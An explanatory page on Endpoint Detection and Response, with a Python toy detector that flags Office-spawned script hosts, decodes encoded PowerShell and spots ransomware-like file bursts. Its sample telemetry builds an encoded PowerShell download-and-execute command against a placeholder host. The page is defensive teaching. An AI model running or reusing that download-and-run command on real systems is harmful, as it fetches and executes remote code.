Overview
Direct Answer
Endpoint Detection and Response (EDR) is a cybersecurity platform that continuously monitors endpoint devices—such as desktops, laptops, and servers—to identify, investigate, and contain advanced threats in real time. It combines behavioural analytics with forensic capabilities to detect malicious activity that traditional antivirus solutions may miss.
How It Works
EDR agents installed on endpoints collect telemetry such as process creation (including parent-child relationships and command lines), network connections, file modifications, and registry changes, and stream it to a central analysis backend. There the data is evaluated against threat intelligence and behavioural rules or baselines, so that a suspicious sequence of otherwise ordinary events (for example, an Office application spawning a script interpreter that then rewrites many user files) is flagged even when no individual file matches a known signature. Upon detection, the platform lets security teams isolate the affected device from the network, terminate malicious processes, and reconstruct the timeline of what happened in order to establish the attack's scope and origin.
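The following Python is an added illustration of that loop and is not code from any EDR product. It runs three behavioural rules over a small set of constructed telemetry events (the field names `ts`, `host`, `pid`, `ppid`, `image`, `cmdline`, `op` and `path` are assumptions, not a vendor schema), decodes an encoded PowerShell command line so the analyst sees the real instruction, and maps the resulting alerts to containment actions under an assumed policy of isolating a host once two or more independent rules agree.

```python
"""Toy behavioural detection over endpoint telemetry.

Added example: illustrative code, not any EDR vendor's engine or schema.
Event field names (ts, host, type, pid, ppid, image, cmdline, op, path) are assumptions.
"""
import base64
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed payload: a download-and-execute one-liner encoded the way
# `powershell -enc` expects (base64 over UTF-16LE). The URL is a placeholder.
ENCODED_CMD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')".encode("utf-16le")
).decode("ascii")

# Constructed sample telemetry for two hosts: one compromised via a macro
# document, one running a legitimate script launched from the desktop.
EVENTS = [
    {"ts": 1, "host": "ws-042", "type": "process", "pid": 412, "ppid": 300, "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"ts": 2, "host": "ws-042", "type": "process", "pid": 518, "ppid": 412, "image": "winword.exe", "cmdline": "winword.exe /n invoice.docm"},
    {"ts": 3, "host": "ws-042", "type": "process", "pid": 611, "ppid": 518, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_CMD}"},
    {"ts": 4, "host": "ws-042", "type": "network", "pid": 611, "dst": "example.test", "port": 80},
] + [
    {"ts": 5 + i, "host": "ws-042", "type": "file", "pid": 611, "op": "rename",
     "path": f"C:\\Users\\alice\\Documents\\report{i}.docx.locked"} for i in range(6)
] + [
    {"ts": 20, "host": "ws-007", "type": "process", "pid": 900, "ppid": 120, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"ts": 21, "host": "ws-007", "type": "process", "pid": 901, "ppid": 900, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Recover the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events, burst_threshold=5, burst_window=10):
    """Run three behavioural rules over time-ordered telemetry and return alerts."""
    procs = {}                   # (host, pid) -> process-start event, for parent lookup
    file_ts = defaultdict(list)  # (host, pid) -> timestamps of writes/renames under C:\Users
    burst_fired = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["pid"])
        if ev["type"] == "process":
            procs[key] = ev
            parent = procs.get((ev["host"], ev["ppid"]))
            # Rule 1: an Office application spawning a script host is a classic
            # macro-to-payload chain that a file signature on the document would miss.
            if parent and parent["image"] in OFFICE_APPS and ev["image"] in SCRIPT_HOSTS:
                alerts.append({"rule": "office_spawns_script_host", "host": ev["host"], "pid": ev["pid"],
                               "detail": f'{parent["image"]} -> {ev["image"]}'})
            # Rule 2: encoded command lines hide intent from string matching; decode
            # them so the alert carries the actual instruction.
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                alerts.append({"rule": "encoded_powershell", "host": ev["host"], "pid": ev["pid"], "detail": decoded})
        elif ev["type"] == "file" and ev["op"] in ("write", "rename") and ev["path"].lower().startswith("c:\\users\\"):
            # Rule 3: one process touching many user files in a short window is
            # ransomware-like, whatever extension it uses.
            file_ts[key].append(ev["ts"])
            recent = [t for t in file_ts[key] if ev["ts"] - t <= burst_window]
            if len(recent) >= burst_threshold and key not in burst_fired:
                burst_fired.add(key)
                alerts.append({"rule": "file_modification_burst", "host": ev["host"], "pid": ev["pid"],
                               "detail": f"{len(recent)} user files modified within {burst_window}s"})
    return alerts


def respond(alerts, isolate_when_rules=2):
    """Map alerts to containment actions: kill each offending process, and isolate
    a host once several independent rules agree (the threshold is an assumed policy)."""
    actions = set()
    rules_per_host = defaultdict(set)
    for a in alerts:
        actions.add(("kill_process", a["host"], a["pid"]))
        rules_per_host[a["host"]].add(a["rule"])
    for host, rules in rules_per_host.items():
        if len(rules) >= isolate_when_rules:
            actions.add(("isolate_host", host))
    return sorted(actions)


if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(f'[{a["host"]}] {a["rule"]} pid={a["pid"]}: {a["detail"]}')
    for act in respond(found):
        print("action:", act)
```

Run as a script it prints three alerts for `ws-042` (the process-chain rule, the decoded download-and-execute command, and the file burst) followed by a kill and an isolate action, while the legitimate `backup.ps1` launch on `ws-007` produces nothing: none of the rules depends on the hash of a file, which is the point of behavioural detection. The counterpart of that strength is visible too: rule 3 needs a threshold and a window, and tuning those against an organisation's real file activity is where the false-positive work described later on this page is spent.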
Why It Matters
Organisations need EDR because capable attackers routinely evade signature-based defences, using living-off-the-land binaries, encoded command lines and custom tooling that no signature matches. By alerting on behaviour rather than file hashes, EDR can shorten the interval between initial compromise and detection, and with it the time an intruder has to move laterally and exfiltrate data. Regulatory frameworks increasingly expect demonstrable threat-detection capability, and the telemetry EDR retains supplies the forensic evidence that incident response and compliance audits require.
Common Applications
Financial institutions deploy EDR to detect insider threats and data exfiltration. Healthcare organisations use it to protect patient data from ransomware. Manufacturing firms leverage EDR to identify industrial espionage and supply chain compromise attempts.
Key Considerations
EDR generates high volumes of telemetry that require significant storage and infrastructure investment, and skilled analysts to investigate the resulting alerts; false positive rates vary markedly between platforms and depend heavily on how detection rules are tuned for the environment. Visibility is limited to devices that run the agent, so unmanaged devices, shadow IT, and systems on which an agent cannot be installed remain unmonitored. The agent is itself a target: an attacker with administrative rights on an endpoint will attempt to disable or tamper with it, so tamper protection and alerting on sensors that go silent are part of a sound deployment.